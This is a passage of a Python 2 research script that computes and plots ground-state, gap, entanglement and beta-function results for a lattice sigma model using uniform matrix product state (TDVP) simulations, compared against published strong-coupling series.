1\n else:\n ga_ = sp.argwhere(eijk[al, be, :] != 0)[0]\n c = eijk[al, be, ga_]\n \n com_ = -0.5j * c * N[ga_]\n #print la.norm(com), la.norm(com_)\n print \"[PL_%d, N_%d] = -0.5j * %d * N_%d\" % (al, be, c, ga_), sp.allclose(com, com_)\n \ndef get_ham(g2inv, ops, a=1.):\n U, P, P2, ReUUH, ReUUH_tp = ops\n d = P2.shape[0]\n \n if g2inv == 0:\n h = (1 / (2. * a) * sp.kron(P2, sp.eye(d))).reshape(d, d, d, d)\n else:\n h = (1 / (2. * a * g2inv) * sp.kron(P2, sp.eye(d)).reshape(d, d, d, d) \n - 2 * g2inv / a * ReUUH)\n return h\n \ndef get_ham_tp(g2inv, ops, a=1.):\n U, P, P2, ReUUH, ReUUH_tp = ops\n d = P2.shape[0]\n \n if g2inv == 0:\n h = [[1 / (2. * a) * P2, sp.eye(d)]]\n else:\n fac = -2. * g2inv / a\n ReUUH_ = [[fac * tp[j] if j == 0 else tp[j] for j in [0, 1]] for tp in ReUUH_tp]\n h = [[1 / (2. * a * g2inv) * P2, sp.eye(d)]] + ReUUH_\n return h\n\ndef create_tdvp(D, ham, L=1, zero_tol=0, sanity_checks=False, ham_tp=None):\n s = tdvp.EvoMPS_TDVP_Uniform(D, ham.shape[0], ham, L=L)\n s.zero_tol = zero_tol\n s.sanity_checks = sanity_checks\n s.itr_atol = 1E-14\n s.itr_rtol = 1E-14\n s.ev_arpack_CUDA = use_CUDA\n s.PPinv_use_CUDA = use_CUDA\n s.ham_tp = ham_tp\n return s\n\ndef state_file(s, G, g2inv, max_ir, max_tries=10, loc='state_data/'):\n ts = datetime.datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\n for i in xrange(max_tries):\n grnd_fname = \"ke_state_G%d_L%d_D%d_maxir%d_g2inv%.4f_T%s_%u.npy\" % (\n G, s.L, s.D, max_ir, g2inv, ts, i)\n try:\n f = open(loc + grnd_fname, 'rb')\n f.close()\n except IOError:\n f = open(loc + grnd_fname, 'wb')\n break\n \n return f, grnd_fname\n\ndef save_result(s, G, g2inv, max_ir, wv=sp.NaN, gap_wv=sp.NaN, v0=None, ops=None, \n existing_fn=None, res_file='petal_res.txt'):\n exc_fn = ''\n if existing_fn is None:\n f, fn = state_file(s, G, g2inv, max_ir)\n s.save_state(f, userdata={'g2inv': g2inv, 'eta': s.eta})\n if not v0 is None:\n exc_fn = fn[:-4] + '_v0.npy'\n sp.save(exc_fn, v0)\n else:\n fn = existing_fn\n \n row = get_res_row(s, G, g2inv, max_ir, wv=wv, gap_wv=gap_wv, ops=ops)\n \n row[cols['exc_fn']] = exc_fn\n row[cols['fn']] = fn\n \n assert len(filter(lambda x: x is None, row)) == 0\n \n resf = open(res_file, 'a')\n fcntl.flock(resf, fcntl.LOCK_EX)\n resf.write(\"\\t\".join(map(str, row)) + \"\\n\")\n resf.close()\n \n return row\n\ndef get_res_row(s, G, g2inv, max_ir, ops=None, wv=sp.NaN, gap_wv=sp.NaN):\n d = s.q\n \n U, P, P2, ReUUH, ReUUH_tp = ops\n \n exUs = sp.array(map(lambda k: s.expect_1s(U[0][0], k=k), range(s.L)))\n exPs = sp.array(map(lambda k: s.expect_1s(P[0], k=k), range(s.L)))\n \n U2 = U[0][0].dot(U[0][0])\n exU2s = sp.array(map(lambda k: s.expect_1s(U2, k=k), range(s.L)))\n \n exP2s = sp.array(map(lambda k: s.expect_1s(P2, k=k).real, range(s.L)))\n \n exReUUHs = sp.array(map(lambda k: s.expect_2s_tp(ReUUH_tp, k=k).real, range(s.L)))\n \n ReUUH2 = ReUUH.reshape(d**2, d**2).dot(ReUUH.reshape(d**2, d**2)).reshape(d,d,d,d)\n s.calc_AA()\n exReUUH2s = sp.array(map(lambda k: s.expect_2s(ReUUH2, k=k).real, range(s.L)))\n \n entrs = sp.array(map(s.entropy, range(s.L)))\n \n row = [None] * len(cols)\n row[cols['G']] = G\n row[cols['g2inv']] = g2inv\n row[cols['D']] = s.D\n row[cols['L']] = s.L\n row[cols['max_ir']] = max_ir\n row[cols['eta']] = s.eta.real\n row[cols['max_ir_oc']] = s.basis_occupancy()[-1]\n row[cols['energy']] = s.h_expect.real\n row[cols['cl']] = s.correlation_length()\n row[cols['entr_max']] = entrs.max()\n row[cols['U_av']] = exUs.mean()\n row[cols['U_0']] = exUs[0]\n row[cols['U2_0']] = exU2s[0]\n row[cols['P_av']] = exPs.mean()\n row[cols['P_0']] = exPs[0]\n row[cols['P2_0']] = exP2s[0]\n row[cols['ReUUH_av']] = exReUUHs.mean()\n row[cols['ReUUH_0']] = exReUUHs[0]\n row[cols['ReUUH2_0']] = exReUUH2s[0]\n row[cols['wv_dom']] = wv\n row[cols['wv_fit']] = sp.NaN\n row[cols['gap']] = gap_wv\n \n return row\n \nDCOLRANGE = sp.arange(16, 256 + 1)\nDCOLPAL = cm.jet\ndef get_D_colmap():\n cmap = cm.ScalarMappable(cmap=DCOLPAL)\n cmap.set_array(DCOLRANGE)\n cmap.autoscale()\n\n return cmap\n\nLMARKERS = [None, '+', 'x', 'x', 'x']\ndef get_markers():\n #import matplotlib.markers as mrk\n #return mrk.MarkerStyle.markers.keys()\n return LMARKERS\n \ndef plot_colormap():\n import matplotlib.pyplot as plt\n \n cm = get_D_colmap()\n \n Ds = range(16, 128)\n \n plt.scatter(Ds, Ds, s=80, c=cm.to_rgba(Ds))\n plt.show()\n\ndef plot_Ds(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['D']], s=80, c=cm.to_rgba(ress[mask, 2]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$D$')\n plt.show()\n \ndef plot_energy(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['energy']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$h$')\n plt.show()\n \ndef plot_energy_deriv(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n x = ress[:, cols[PARAM]]\n d1_y_Ham = -2. * ress[:, cols['ReUUH_av']] - x**(-2) / 2. * ress[:, cols['P2_0']]\n \n dx = sp.ediff1d(x)\n d_x = x[:-1] + dx / 2.\n d1_y = sp.ediff1d(ress[:, cols['energy']]) / dx\n d2_y = sp.ediff1d(d1_y_Ham) / dx\n dx_fd = dx[:-1]\n d2_x_fd = x[:-2] + sp.ediff1d(d_x)\n d2_y_fd = sp.ediff1d(d1_y) / dx_fd\n \n plt.figure(1)\n plt.plot(d_x, d1_y, '--')\n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(x[mask], d1_y_Ham[mask], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$dE/d' + PARAM_TEX + '$')\n \n plt.figure(2)\n plt.plot(d_x, d2_y, '-o')\n plt.plot(d2_x_fd, d2_y_fd, '--')\n plt.xlabel('$g^{-2}$')\n plt.ylabel('$d^2E/d(' + PARAM_TEX + ')^2$')\n print \"d2e min at:\", d_x[d2_y.argmin()]\n plt.show()\n \ndef plot_beta(res_file=\"petal_res.txt\", G=1, fmt='o', lbl=None, plot_an=True, \n usualg=False, SBtol=1E-4, ecol=None, fcol=None, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols), dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, G=G, **kwargs)\n \n filt = abs(ress[:, cols['U_0']]) < SBtol\n ress = ress[filt, :]\n \n if G == 1:\n N = 2\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n elif G == 2:\n N = 4\n g2i_fac = 4\n E_fac = 1.\n \n x = 2 * (g2i_fac * ress[:, cols[PARAM]])**2\n #plot_x = 1. / (g2i_fac * ress[:, cols[PARAM]])\n #d_plot_x = sp.ediff1d(plot_x)\n #plot_x = plot_x[:-1] - d_plot_x / 2\n #plot_x = plot_x[:-1]\n y = 2 * g2i_fac * ress[:, cols[PARAM]] * E_fac * ress[:, cols['gap']]\n\n dx = sp.ediff1d(x)\n d_x = x[:-1] + dx / 2 #use midpoints as x coord for the derivative\n plot_x = sp.sqrt(2 / d_x)\n dy = sp.ediff1d(y)\n d1_y = dy / dx\n d_y = y[:-1] + dy / 2\n \n m_beta_g = 1. / (1 - 2 * d_x * d1_y / d_y)\n \n g_app = sp.linspace(0, 4, num=1000)\n \n #The following strong coupling series expansions are from Hamer et al. 1979\n if G == 2:\n _p = [1, 0.064665, -0.19101, 0.015944, 0.052396, -7.2098E-3, 5.572E-5, 1.2339E-3]\n _p = _p[::-1]\n _q = [1, 0.064665, 0.47565, 0.059053, 0.063937, 0.0124, 0.02263, -4.419E-4, 3.3764E-3]\n _q = _q[::-1]\n y_app = sp.polyval(_p, 1./g_app) / sp.polyval(_q, 1./g_app)\n elif G == 1:\n _p = [1., -0.1413, -0.2589, -0.1662, 0.09704]\n _p = _p[::-1]\n _q = [1., 1.8587, 0.9584, 0.1664, -0.07654]\n _q = _q[::-1]\n y_app = sp.polyval(_p, 2./g_app**2) / sp.polyval(_q, 2./g_app**2)\n\n y_weak = (N - 2) * g_app / (2 * sp.pi) + (N - 2) * g_app**2 / (4 * sp.pi**2)\n \n xfac = 1.\n yfac = 1.\n if usualg:\n xfac = g2i_fac\n yfac = 1. / g2i_fac\n \n if plot_an:\n plt.plot([0, xfac * 4], [yfac, yfac], 'k-')\n if N > 2:\n plt.plot(xfac * g_app, yfac * y_weak, 'g-', label='WC')\n if G == 1:\n filt = y_app < 0\n app_start = g_app[filt].max()\n filt = g_app > app_start\n else:\n filt = sp.ones((g_app.shape[0],), dtype=bool)\n l, = plt.plot(xfac * g_app[filt], yfac * y_app[filt], 'k--', label=\"Pad\\\\'{e}\")\n l.set_dashes((1.5, 0.5))\n \n filt = (m_beta_g > 0) * (m_beta_g < 1)\n plt.plot(xfac * plot_x[filt], yfac * m_beta_g[filt], fmt, label=lbl,\n markersize=2.5, markeredgewidth=0.5,\n markeredgecolor=ecol, markerfacecolor=fcol)\n# pf, cf = sp.polyfit(xfac * plot_x[filt], yfac * m_beta_g[filt], 1, cov=True)\n# print \"fit\", pf, cf, -pf[1]/pf[0]\n# plt.plot(xfac * g_app, sp.polyval(pf, xfac * g_app), '-')\n \n if usualg:\n plt.xlabel('$g^2$' )\n plt.ylabel('$-\\\\beta(g^2) / g^{2}$')\n else:\n plt.xlabel('$\\\\tilde{g}$' )\n plt.ylabel('$-\\\\beta(\\\\tilde g) / \\\\tilde{g}$')\n #plt.xlim((0, 2.1))\n #plt.ylim((0, 1.2))\n plt.show()\n \ndef filt_res(ress, G=1, pars=None, max_irs=None, Ds=None, Ls=None, lowest_en=False, par_decimals=4):\n filt = ress[:, cols['G']] == G\n ress = ress[filt, :]\n \n if not max_irs is None:\n filt = sp.in1d(ress[:, cols['max_ir']], max_irs)\n ress = ress[filt, :]\n \n if not Ds is None:\n filt = sp.in1d(ress[:, cols['D']], Ds)\n ress = ress[filt, :]\n \n if not pars is None:\n filt = sp.in1d(sp.around(ress[:, cols[PARAM]], decimals=par_decimals), sp.around(pars, decimals=par_decimals))\n ress = ress[filt, :]\n \n if Ls is None:\n Ls = sp.unique(ress[:, cols['L']])\n else:\n filt = sp.in1d(ress[:, cols['L']], Ls)\n ress = ress[filt, :]\n \n if lowest_en:\n ka_rounded = sp.around(ress[:, cols[PARAM]], decimals=par_decimals)\n en_rounded = sp.around(ress[:, cols['energy']], decimals=12)\n\n to_sort = sp.column_stack((ka_rounded, ress[:, cols[PARAM]], en_rounded,\n ress[:, cols['eta']])).view('complex128,complex128,complex128,complex128')\n\n sort1 = sp.argsort(to_sort, axis=0, order=['f1']) #first sort by full precision param\n #must now sort by rounded values for unique to work properly\n #must also use a stable algo to maintain ordering\n sort2 = sp.argsort(to_sort[sort1], order=['f0', 'f2', 'f3'], axis=0, kind='mergesort')\n\n sort_final = sort1[sort2]\n to_sort = to_sort.view(sp.float64)\n to_sort = sp.squeeze(to_sort)\n sort_final = sp.squeeze(sort_final)\n \n #filter based on rounded values. return_index forces merge_sort, which is stable!\n blah, unq_ind, blah2 = sp.unique(to_sort[sort_final, 0], return_index=True, return_inverse=True)\n sort_filt = sort_final[unq_ind]\n \n ress = ress[sort_filt, :]\n else:\n sort1 = sp.argsort(ress[:, cols[PARAM]])\n ress = ress[sort1, :]\n \n return ress, Ls\n \ndef get_num_ress(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n ress, Ls = filt_res(ress, **kwargs)\n \n return ress\n \ndef get_col(colname, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n ress, Ls = filt_res(ress, **kwargs)\n \n return ress[:, cols[colname]]\n \ndef plot_col(colname, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols[colname]], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel(colname)\n plt.show()\n \ndef plot_U00(res_file=\"petal_res.txt\", broken_tol=1E-3, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]].real, abs(ress[mask, cols['U_0']]), s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n broken = abs(ress[mask, cols['U_0']]) > broken_tol\n print \"L=\", L, \"last symm. g2inv =\", ress[mask, cols[PARAM]][broken].min().real\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$U_{0,0}$')\n plt.show()\n \ndef plot_gap(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n if not sp.all(sp.isnan(ress[mask, cols['gap']])):\n #print ress[mask, 1], ress[mask, -1], cm.to_rgba(ress[mask, 2])\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['gap']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$(E_1 - E_0)$')\n plt.show()\n \ndef plot_gap_log(res_file=\"petal_res.txt\", G=1, plot_an=True, lbl=None, \n fmt='o', ecol=None, fcol=None, usualg=False, SBtol=1E-3, \n C=None, eta_corr=True, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n\n if G == 1:\n N = 2\n g2i_fac = sp.sqrt(2)\n E_fac = 1. / sp.sqrt(2)\n elif G == 2:\n N = 4\n g2i_fac = 4\n E_fac = 1.\n \n x_app = sp.linspace(0, 3, num=1000) #1/g'\n \n #The following strong coupling series expansions are from Hamer et al. 1979\n if G == 2:\n #se = [1.0, -1./6, +0.005208, +0.0003798, +0.00000417397, -0.00000036076, -0.000000252236]\n #The above is just 1/3 times the following:\n se = [3., -0.5, 0.015625, 1.139323E-3, 1.25219E-5, -1.082289E-6, -7.56709E-7]\n se = se[::-1]\n y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 2 * x_app**2)\n elif G == 1:\n se = [1., -1., 0.125, 0.03125, 1.438802E-2, 6.002063E-3, 2.26148E-4, 6.95799E-4, -1.752E-4]\n se = se[::-1]\n y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 2 * x_app**2)\n ##Hornby and Barber 1985\n #se = [1., -2., 0.5, 0.25, 0.2302083, 0.192065972, 0.0144735794,\n # 0.0890622894, -0.0448071196, 0.0359987647, -0.0818017597]\n #se = se[::-1]\n #y_app = sp.sqrt(1./x_app**3 * 1./4.) * sp.polyval(se, 1 * x_app**2)\n \n xfac = 1\n yfac = 1\n if usualg:\n xfac = 1. / g2i_fac\n yfac = sp.sqrt(g2i_fac) / E_fac\n \n if plot_an:\n l, = plt.plot(xfac * x_app, yfac * y_app, 'k--', label=\"SC\")\n l.set_dashes((1.5, 0.5))\n \n if G == 2 and plot_an:\n #value from Hasenratz et al. 1990, modified for spatial discretisation \n #using Shigemitsu & Kogut 1981 (based on Parisi's result for the\n #Euclidean lattice). \n if C is None:\n C = 8 * sp.exp(0.5) * sp.sqrt(32./(sp.pi * sp.e))\n y_weak = C * sp.sqrt(sp.pi) * sp.exp(-sp.pi * x_app)\n #Correct for time-space asymmetry s.t. renormalised theory is LI.\n #Also from Shigemitsu & Kogut.\n if eta_corr:\n # Comparing with the paper, this original line\n # y_weak /= sp.sqrt(1 + 1. / x_app / sp.pi)\n # had a sign error!\n y_weak /= sp.sqrt(1 - 1. / x_app / sp.pi)\n plt.plot(xfac * x_app, yfac * y_weak, 'g-', label='WC')\n \n ress, Ls = filt_res(ress, G=G, **kwargs)\n filt = abs(ress[:, cols['U_0']]) < SBtol\n ress = ress[filt, :] \n \n plt.plot(xfac * g2i_fac * ress[:, cols[PARAM]], \n yfac * E_fac * ress[:, cols['gap']] / sp.sqrt(g2i_fac * ress[:, cols[PARAM]]), \n fmt, label=lbl, markersize=2.5, markeredgewidth=0.5,\n markeredgecolor=ecol, markerfacecolor=fcol)\n \n if usualg:\n plt.xlabel('$g^{-2}$' )\n plt.ylabel('$(E_1 - E_0) g / \\\\sqrt{\\\\eta}$')\n else:\n plt.xlabel('$1 / \\\\tilde g$' )\n plt.ylabel('$(E_1 - E_0) \\\\sqrt{\\\\tilde g} / \\\\sqrt{\\\\eta}$')\n plt.yscale('log')\n #plt.xlim((0, 3))\n #plt.ylim((0.03, 10))\n plt.show()\n \ndef plot_wv(res_file=\"petal_res.txt\", scattersize=80, lw=None, pos_shift=False, \n return_data=False, **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n plts = []\n \n allxs = []\n allys = []\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n if sp.sometrue(mask):\n notlocks = (abs(ress[mask, cols['wv_dom']] / L) % (sp.pi / 4)) >= 1E-6\n print \"Last not-lock at:\", ress[mask, cols[PARAM]][notlocks].max()\n if L == 1:\n xs = ress[mask, cols[PARAM]]\n ys = abs(ress[mask, cols['wv_dom']]) / sp.pi\n cs = ress[mask, cols['D']]\n elif L > 1:\n xs = []\n ys = []\n cs = []\n maxn = int(L) / 2\n for n in xrange(maxn + 1):\n if n > 0:\n xs.append(ress[mask, cols[PARAM]])\n ys.append(n * 2. / L - abs(ress[mask, cols['wv_dom']]) / sp.pi / L)\n cs.append(ress[mask, cols['D']])\n if pos_shift and n < maxn:\n xs.append(ress[mask, cols[PARAM]])\n ys.append(n * 2. / L + abs(ress[mask, cols['wv_dom']]) / sp.pi / L)\n cs.append(ress[mask, cols['D']])\n xs = sp.array(xs).ravel()\n ys = sp.array(ys).ravel()\n cs = sp.array(cs).ravel()\n res = plt.scatter(xs, ys, s=scattersize, c=cm.to_rgba(cs), marker=mrks[int(L)],\n lw=lw)\n plts.append(res)\n allxs.append(xs)\n allys.append(ys)\n allxs = sp.concatenate(allxs)\n allys = sp.concatenate(allys)\n tbl = sp.column_stack((allxs, allys))\n\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$k/\\\\pi$')\n plt.show()\n \n return plts, tbl\n \ndef plot_wv_locks(Ds=None, res_file=\"petal_res.txt\", scattersize=80, lowest_en=True, **kwargs):\n ress_ = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n if Ds is None:\n Ds = sp.unique(ress_[:, cols['D']])\n else:\n Ds = sp.array(Ds)\n \n ka_lls = sp.zeros((len(Ds),), dtype=sp.float64)\n ka_lls.fill(sp.NaN)\n for i, D in enumerate(Ds):\n ress, Ls = filt_res(ress_.copy(), Ds=[D], lowest_en=lowest_en, **kwargs)\n notlocks = (abs(ress[:, cols['wv']] / ress[:, cols['L']]) % (sp.pi / 4)) >= 1E-6\n ka_ll = ress[:, cols[PARAM]][notlocks].max()\n ka_lls[i] = ka_ll.real\n \n pfit, covfit = sp.polyfit(1. / Ds, ka_lls, 1, cov=True)\n fitka = sp.linspace(0, (1. / Ds).max() * 1.1)\n \n print pfit[1], sp.sqrt(covfit[1, 1])\n \n plt.plot(1. / Ds, ka_lls, 'bo')\n plt.plot(fitka, sp.polyval(pfit, fitka), 'k-')\n plt.errorbar(0, pfit[1], yerr=sp.sqrt(covfit[1, 1]), fmt='b')\n plt.xlabel('$1/D$')\n plt.ylabel('$' + PARAM_TEX + '_\\\\mathrm{lock}$')\n plt.xlim((-0.0005, 0.015))\n plt.show()\n \ndef plot_lcl(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], sp.log(ress[mask, cols['cl']]), s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$\\\\log(\\\\xi)$')\n plt.show()\n \ndef plot_icl(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], 1/ress[mask, cols['cl']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$\\\\xi^{-1}$')\n plt.show()\n \ndef plot_entropy(res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n mrks = get_markers()\n cm = get_D_colmap()\n \n ress, Ls = filt_res(ress, **kwargs)\n \n for L in Ls:\n mask = (ress[:, cols['L']] == L)\n plt.scatter(ress[mask, cols[PARAM]], ress[mask, cols['entr_max']], s=80, \n c=cm.to_rgba(ress[mask, cols['D']]), marker=mrks[int(L)])\n plt.xlabel('$' + PARAM_TEX + '$' )\n plt.ylabel('$S$')\n plt.show()\n \ndef plot_cc(Ds, L=1, max_ir=5, pars=None, offset=0, res_file=\"petal_res.txt\", **kwargs):\n ress = sp.genfromtxt(res_file, delimiter=\"\\t\", usecols=range(num_floatcols),\n dtype=sp.complex128)\n \n import matplotlib.pyplot as plt\n \n ress, Ls = filt_res(ress, pars=pars, Ds=Ds, Ls=[L], **kwargs)\n \n filt = (ress[:, cols['max_ir']] == max_ir) * (ress[:, cols['L']] == L) * sp.in1d(ress[:, cols['D']], Ds)\n ress = ress[filt, :]\n \n if pars is None:\n pars = sp.unique(ress[:, cols[PARAM]])\n ccs = sp.array([sp.NaN] * len(pars))\n cc_vars = sp.array([sp.NaN] * len(pars))\n fits = [None] * len(pars)\n Dss = [None] * len(pars)\n logcls = [None] * len(pars)\n entrs = [None] * len(pars)\n \n for i in xrange(len(pars)):\n par = pars[i]\n mask = (abs(ress[:, cols[PARAM]] - par) < 1E-12)\n \n Dss[i] = ress[mask, cols['D']]\n if not sp.all(sp.in1d(Ds, Dss[i])):\n print \"Not all Ds present at\", par\n continue\n \n logcls[i] = sp.log2(ress[mask, cols['cl']])\n entrs[i] = ress[mask, cols['entr_max']]\n try:\n p, V = sp.polyfit(logcls[i], entrs[i], 1, cov=True)\n ccs[i] = p[0] * 6\n cc_vars[i] = V[0, 0] * 6**2\n fits[i] = sp.polyval(p, logcls[i])\n except sp.linalg.LinAlgError:\n print \"cc fit error with\", par\n \n nf = sp.invert(sp.isnan(ccs))\n tvar = sp.sum(ccs[nf]**2 * cc_vars[nf])\n print ccs[nf].mean(), sp.sqrt(tvar/len(ccs[nf]))\n \n plt.figure(1) \n plt.errorbar(pars, ccs, yerr=sp.sqrt(cc_vars), fmt='bx', capsize=1.5, elinewidth=0.3, markersize=2, markeredgewidth=0.3)\n plt.xlabel('$' + PARAM_TEX + '$')\n plt.ylabel('$c$')\n\n plt.figure(2)\n cur_off = 0\n for i in xrange(len(pars)): \n if not fits[i] is None:\n l, = plt.plot(logcls[i], cur_off + entrs[i], 'o', \n label=\"$\" + PARAM_TEX + \" = %.2f\" % pars[i] + \n \"$, $c=%.3f \\\\pm %.3f$\" % (ccs[i], sp.sqrt(cc_vars[i])))\n plt.plot(logcls[i], cur_off + fits[i], '-', color=l.get_color())\n cur_off -= offset\n plt.xlabel(\"$\\\\log(\\\\xi)$\")\n if cur_off == 0:\n plt.ylabel(\"$S$\")\n else:\n plt.ylabel(\"$S +$ const.\")\n plt.legend(loc=4)\n \n plt.show()\n\ndef calc_cf(s, op, d=20, k=0):\n ccf, ex1, ex2 = s.correlation_1s_1s(op, op, d, k=k, return_exvals=True)\n \n var = sp.zeros((s.L), dtype=sp.complex128)\n op2 = op.dot(op)\n for k in xrange(s.L):\n var[k] = s.expect_1s(op2, k) - ex1[k]**2\n \n return ccf, ex1, var\n\ndef pub_plots_prep():\n import matplotlib.pyplot as plt\n plt.rcParams['text.usetex'] = True\n plt.rcParams['ps.usedistiller'] = 'xpdf'\n plt.rcParams['font.size'] = 8\n plt.rcParams['font.family'] = 'serif'\n plt.rcParams['font.serif'] = 'Computer Modern Roman' \n \n plt.rcParams['figure.figsize'] = [3.5, 2.5] #inches...\n plt.rcParams['figure.subplot.bottom'] = 0.2\n plt.rcParams['figure.subplot.left'] = 0.16\n plt.rcParams['figure.subplot.top'] = 0.95\n plt.rcParams['figure.subplot.right'] = 0.96\n plt.rcParams['lines.markersize'] = 2.5\n plt.rcParams['lines.markeredgewidth'] = 0\n plt.rcParams['lines.linewidth'] = 0.5\n \n plt.rcParams['legend.fancybox'] = True\n plt.rcParams['legend.fontsize'] = 8\n \n plt.rcParams['axes.linewidth'] = 0.5\n\ndef pub_plot_gaps(usualg=False):\n import matplotlib.pyplot as plt\n \n if not usualg:\n g2i_fac = 4\n E_fac = 1\n else:\n g2i_fac = 1\n E_fac = 1. \n \n plt.figure(figsize=(3.5, 2.5))\n plt.subplot(122)\n plt.title('(b) $O(4)$')\n #plot_gap_log(G=2, Ds=[55], max_irs=[4], lowest_en=True, usualg=True,\n # lbl='$D=55$,\\n $l \\\\le 2$', plot_an=True, fmt='bo')\n plot_gap_log(G=2, Ds=[91], max_irs=[4], lowest_en=True, usualg=usualg,\n lbl='$D=91$,\\n $l \\\\le 2$', plot_an=True, fmt='cD',\n fcol='None', ecol='c') \n #plot_gap_log(G=2, Ds=[91], max_irs=[3], lowest_en=True, usualg=True, \n # lbl='$D=91$,\\n $l \\\\le 3/2$', plot_an=False, fmt='ro')\n plot_gap_log(G=2, Ds=[140], max_irs=[3], lowest_en=True, usualg=usualg,\n lbl='$D=140$,\\n $l \\\\le 3/2$', plot_an=False, fmt='r^',\n fcol='None', ecol='r')\n plot_gap_log(G=2, Ds=[140], max_irs=[4], lowest_en=True, usualg=usualg,\n 